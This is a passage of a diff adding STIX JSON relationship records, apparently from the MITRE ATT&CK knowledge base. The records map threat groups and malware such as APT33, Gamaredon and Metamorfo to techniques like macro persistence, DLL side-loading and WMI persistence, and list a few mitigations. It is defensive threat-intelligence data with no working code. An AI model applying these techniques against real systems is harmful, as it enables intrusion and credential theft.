+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has inserted malicious macros into existing documents, providing persistence when they are reopened. [Gamaredon Group](https://attack.mitre.org/groups/G0047) has loaded the group's previously delivered VBA project by relaunching Microsoft Outlook with the /altvba option, once the Application.Startup event is received.(Citation: ESET Gamaredon June 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--f78a5009-59ec-4ae2-89a0-44b8be49a140",
+ "type": "relationship",
+ "modified": "2020-06-22T19:08:12.265Z",
+ "created": "2020-06-22T19:08:12.265Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has used cmd.exe /c to execute files.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--c7735813-64b9-47ba-8d98-81e7bfc25a80",
+ "type": "relationship",
+ "modified": "2020-06-22T19:56:19.422Z",
+ "created": "2020-06-22T19:56:19.422Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "external_references": [
+ {
+ "source_name": "Microsoft Holmium June 2020",
+ "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
+ "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020."
+ }
+ ],
+ "description": "[APT33](https://attack.mitre.org/groups/G0064) has used VBScript to initiate the delivery of payloads.(Citation: Microsoft Holmium June 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--e0d647cf-69a0-416f-8db4-cfd72fbd6ad3",
+ "type": "relationship",
+ "modified": "2020-06-22T20:15:32.199Z",
+ "created": "2020-06-22T20:15:32.199Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f",
+ "target_ref": "attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65",
+ "external_references": [
+ {
+ "source_name": "Microsoft Holmium June 2020",
+ "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
+ "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020."
+ }
+ ],
+ "description": "[APT33](https://attack.mitre.org/groups/G0064) has used compromised Office 365 accounts in tandem with [Ruler](https://attack.mitre.org/software/S0358) in an attempt to gain control of endpoints.(Citation: Microsoft Holmium June 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--e93a3bf7-2ca4-42ed-872a-f9f0f8458936",
+ "type": "relationship",
+ "modified": "2020-06-29T15:02:31.591Z",
+ "created": "2020-06-22T20:15:32.190Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "Microsoft Holmium June 2020",
+ "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
+ "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020."
+ }
+ ],
+ "description": "[APT33](https://attack.mitre.org/groups/G0064) has sent spearphishing e-mails with archive attachments.(Citation: Microsoft Holmium June 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--54fd87c2-7d29-422f-bf92-96e7d603563f",
+ "type": "relationship",
+ "modified": "2020-06-22T20:15:32.216Z",
+ "created": "2020-06-22T20:15:32.216Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Microsoft Holmium June 2020",
+ "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
+ "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020."
+ }
+ ],
+ "description": "[APT33](https://attack.mitre.org/groups/G0064) has used malicious e-mail attachments to lure victims into executing malware.(Citation: Microsoft Holmium June 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--ed0428f5-d354-4827-8f9a-95177ce0a1cb",
+ "type": "relationship",
+ "modified": "2020-06-22T20:15:32.208Z",
+ "created": "2020-06-22T20:15:32.208Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455)'s C&C communication has been encrypted using OpenSSL.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--104334fa-4d32-48ab-a55d-c481ce7c4cd3",
+ "type": "relationship",
+ "modified": "2020-06-22T20:34:05.348Z",
+ "created": "2020-06-22T20:34:05.348Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has used MSI to download files for execution.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--de745ef4-59a0-470c-95c9-5043a717dc54",
+ "type": "relationship",
+ "modified": "2020-06-22T20:34:05.362Z",
+ "created": "2020-06-22T20:34:05.362Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has deleted itself from the system after execution.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--667c0879-3ea2-48f1-9a1b-ceefca33aa43",
+ "type": "relationship",
+ "modified": "2020-06-22T20:34:05.376Z",
+ "created": "2020-06-22T20:34:05.376Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has digitally signed executables using Avast.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--baeb8449-b956-4119-aea5-717570edb513",
+ "type": "relationship",
+ "modified": "2020-06-22T20:34:05.387Z",
+ "created": "2020-06-22T20:34:05.387Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has used HTTP for downloading items.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--168f47ab-980f-4e10-91f4-ffd2acf09a7f",
+ "type": "relationship",
+ "modified": "2020-06-22T20:34:05.396Z",
+ "created": "2020-06-22T20:34:05.396Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has written process names to the Registry.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--676c5a2a-323b-4166-9c83-8c6e5e25bb1f",
+ "type": "relationship",
+ "modified": "2020-06-22T20:34:05.403Z",
+ "created": "2020-06-22T20:34:05.403Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has performed process name checks and has monitored applications.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--eac61f60-a87d-4f83-b5e0-64542efeca6b",
+ "type": "relationship",
+ "modified": "2020-06-22T20:34:05.416Z",
+ "created": "2020-06-22T20:34:05.416Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) developed the payload using JavaScript.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--07f72efd-7960-4530-92f3-6ced33087212",
+ "type": "relationship",
+ "modified": "2020-06-23T19:58:26.065Z",
+ "created": "2020-06-22T20:34:05.418Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f",
+ "target_ref": "attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58",
+ "external_references": [
+ {
+ "source_name": "Microsoft Holmium June 2020",
+ "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
+ "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020."
+ }
+ ],
+ "description": "[APT33](https://attack.mitre.org/groups/G0064) has attempted to use WMI event subscriptions to establish persistence on compromised hosts.(Citation: Microsoft Holmium June 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--9e1bb696-e1f0-46d3-ab91-79280323d711",
+ "type": "relationship",
+ "modified": "2020-06-22T20:34:36.748Z",
+ "created": "2020-06-22T20:34:36.748Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) malware has used CreateProcess to launch additional malicious components.(Citation: ESET Gamaredon June 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--9c51f7a2-346b-4ef9-ade0-ac2c5c845c27",
+ "type": "relationship",
+ "modified": "2020-06-22T21:18:35.451Z",
+ "created": "2020-06-22T21:18:35.451Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) has used HTTP for command and control.(Citation: McAfee Sharpshooter December 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--7a0baa06-e3f1-4488-a0f6-ecf405413679",
+ "type": "relationship",
+ "modified": "2020-06-23T00:42:36.296Z",
+ "created": "2020-06-23T00:42:36.296Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--36ede314-7db4-4d09-b53d-81bbfbe5f6f8",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[Avenger](https://attack.mitre.org/software/S0473) can identify the domain of the compromised host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7fbbab0b-8e78-4352-ad0b-ae9a2eeffba5",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.649Z",
+ "created": "2020-06-23T17:59:53.341Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
+ "target_ref": "attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used legitimate applications to side-load malicious DLLs.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--881b3ad2-38dd-45b0-b75b-49acf6f7c6a3",
+ "type": "relationship",
+ "modified": "2020-06-24T01:29:47.695Z",
+ "created": "2020-06-23T18:12:47.888Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--a6a47a06-08fc-4ec4-bdc3-20373375ebb9",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "relationship_type": "mitigates",
+ "description": "Anti-virus can be used to automatically quarantine suspicious files. ",
+ "id": "relationship--1461fa53-bc4f-4ae5-b131-3f6058e6a72a",
+ "type": "relationship",
+ "modified": "2020-06-25T03:32:51.267Z",
+ "created": "2020-06-23T18:34:17.840Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--a6a47a06-08fc-4ec4-bdc3-20373375ebb9",
+ "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "relationship_type": "mitigates",
+ "description": "Anti-virus can be used to automatically quarantine suspicious files. ",
+ "id": "relationship--8d56622d-547a-4daa-89b8-1c555d1ac5b7",
+ "type": "relationship",
+ "modified": "2020-06-25T03:19:34.298Z",
+ "created": "2020-06-23T18:59:50.979Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--a6a47a06-08fc-4ec4-bdc3-20373375ebb9",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "relationship_type": "mitigates",
+ "description": "Anti-virus can be used to automatically quarantine suspicious files. ",
+ "id": "relationship--758cbc32-6b33-4012-8622-cd7d218a799c",
+ "type": "relationship",
+ "modified": "2020-06-24T13:51:22.649Z",
+ "created": "2020-06-23T19:02:21.529Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--a6a47a06-08fc-4ec4-bdc3-20373375ebb9",
+ "target_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
+ "relationship_type": "mitigates",
+ "description": "Anti-virus can be used to automatically quarantine suspicious files. ",
+ "id": "relationship--70b511c9-5a2c-4810-87b6-73dfc648ec29",
+ "type": "relationship",
+ "modified": "2020-06-23T19:03:15.337Z",
+ "created": "2020-06-23T19:03:15.337Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--21da4fd4-27ad-4e9c-b93d-0b9b14d02c96",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "relationship_type": "mitigates",
+ "description": "Script blocking extensions can help prevent the execution of JavaScript and HTA files that may commonly be used during the exploitation process. For malicious code served up through ads, adblockers can help prevent that code from executing in the first place.",
+ "id": "relationship--b432bca9-8f75-431d-b0af-f43623e287d4",
+ "type": "relationship",
+ "modified": "2020-06-25T03:23:13.985Z",
+ "created": "2020-06-23T19:12:25.103Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "relationship_type": "mitigates",
+ "description": "Denylist scripting where appropriate.",
+ "id": "relationship--5853af0d-4716-4290-b3d9-63fadfd5f554",
+ "type": "relationship",
+ "modified": "2020-06-25T03:23:14.008Z",
+ "created": "2020-06-23T19:12:25.113Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--eb88d97c-32f1-40be-80f0-d61a4b0b4b31",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "relationship_type": "mitigates",
+ "description": "Turn off or restrict access to unneeded scripting components.",
+ "id": "relationship--a2eb983e-f4ad-45a3-9348-088bbfdbab77",
+ "type": "relationship",
+ "modified": "2020-06-25T03:23:14.006Z",
+ "created": "2020-06-23T19:12:25.119Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "relationship_type": "subtechnique-of",
+ "id": "relationship--f9867ca2-18a1-4e84-ad1d-61d7c85fe4b3",
+ "type": "relationship",
+ "modified": "2020-06-23T19:12:25.121Z",
+ "created": "2020-06-23T19:12:25.121Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--21da4fd4-27ad-4e9c-b93d-0b9b14d02c96",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "relationship_type": "mitigates",
+ "description": "Script blocking extensions can help prevent the execution of scripts and HTA files that may commonly be used during the exploitation process. For malicious code served up through ads, adblockers can help prevent that code from executing in the first place.",
+ "id": "relationship--a6360da7-8678-4d7c-a866-6f2a982a23ba",
+ "type": "relationship",
+ "modified": "2020-06-25T03:32:51.320Z",
+ "created": "2020-06-23T19:13:13.413Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--21da4fd4-27ad-4e9c-b93d-0b9b14d02c96",
+ "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "relationship_type": "mitigates",
+ "description": "Script blocking extensions can help prevent the execution of scripts and HTA files that may commonly be used during the exploitation process. For malicious code served up through ads, adblockers can help prevent that code from executing in the first place.",
+ "id": "relationship--d4dbffc2-246d-4fd4-8c3c-0e7901aaef05",
+ "type": "relationship",
+ "modified": "2020-06-25T03:19:34.302Z",
+ "created": "2020-06-23T19:14:12.712Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--04fc1842-f9e4-47cf-8cb8-5c61becad142",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "external_references": [
+ {
+ "description": "Namestnikov, Y. and Aime, F. (2019, May 8). FIN7.5: the infamous cybercrime rig \u201cFIN7\u201d continues its activities. Retrieved October 11, 2019.",
+ "url": "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/",
+ "source_name": "SecureList Griffon May 2019"
+ }
+ ],
+ "description": "[GRIFFON](https://attack.mitre.org/software/S0417) is written in and executed as [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007).(Citation: SecureList Griffon May 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--58801cab-349a-4f09-b449-149b19bcf085",
+ "type": "relationship",
+ "modified": "2020-06-23T19:20:46.002Z",
+ "created": "2020-06-23T19:20:46.002Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) can collect sensitive mailing information from Exchange servers, including credentials and the domain certificate of an enterprise.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
